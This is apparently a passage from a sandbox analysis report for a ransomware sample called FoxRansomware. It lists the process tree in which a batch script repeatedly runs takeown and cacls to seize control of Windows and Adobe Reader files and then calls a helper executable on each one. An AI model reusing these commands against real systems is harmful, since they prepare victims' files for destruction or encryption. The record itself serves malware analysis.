    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 6484)
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
    - Modifies file permissions
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 7076)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6892)
      NDS5iFeg.exe -accepteula "resource.xml" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 816)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MTOC_help.H1H""2⤵PID:2500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MTOC_help.H1H" /E /G Admin:F /C3⤵PID:1284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MTOC_help.H1H"3⤵PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "Help_MTOC_help.H1H" -nobanner3⤵PID:2040
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "Help_MTOC_help.H1H" -nobanner4⤵PID:1676
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:2760
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:2584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:2628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "device.png" -nobanner3⤵PID:412
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "device.png" -nobanner4⤵PID:808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:1692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:6876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵PID:336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:1232
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Modifies file permissions
PID:2320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "tasks.xml" -nobanner3⤵PID:2944
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "tasks.xml" -nobanner4⤵PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:1636
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:2928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "behavior.xml" -nobanner3⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "behavior.xml" -nobanner4⤵PID:1252
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:2308
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:2420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:1004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:2664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:2544
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:1376
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:1964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "device.png" -nobanner3⤵PID:2236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "device.png" -nobanner4⤵PID:928
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:2132
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:2292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:2988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:2220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:2860
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:2124
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:1452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵PID:2984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "tasks.xml" -nobanner3⤵PID:2956
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "tasks.xml" -nobanner4⤵PID:2252
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:3124
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:2412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:2520
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:2576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:3356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:2572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵PID:3144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "pmd.cer" -nobanner3⤵PID:3380
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "pmd.cer" -nobanner4⤵PID:3168
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:3412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:3452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵
- Modifies file permissions
PID:3492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:3080
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:3400
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:2508
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:1520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵PID:3528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "pdf.gif" -nobanner3⤵PID:3272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "pdf.gif" -nobanner4⤵PID:3188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:3104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:3312
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:3300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "server_issue.gif" -nobanner3⤵PID:3228
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "server_issue.gif" -nobanner4⤵PID:3292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:3560
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:3520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:3832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:3848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:3880
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:3884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:3836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:3424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:3876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:3672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:4124
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:3748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:4120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "zx______.pfm" -nobanner3⤵PID:4112
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "zx______.pfm" -nobanner4⤵PID:3924
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:3544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:3572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:3640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:3764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:3712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4160
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:3984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:3816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:3760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "can32.clx" -nobanner3⤵PID:3692
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "can32.clx" -nobanner4⤵PID:4320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:4000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:1056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵PID:3720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "symbol.txt" -nobanner3⤵PID:4332
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "symbol.txt" -nobanner4⤵PID:2408
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4200
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:3624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:4292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:4240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:3952
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:4172
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:2556
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:4204
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:4184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "behavior.xml" -nobanner3⤵PID:4036
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "behavior.xml" -nobanner4⤵PID:4480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:4488
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:4032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:4372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:4648
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:4680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:1228
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:4416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"3⤵
- Modifies file permissions
PID:4436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:4588
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:4608
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6412
-
-
-
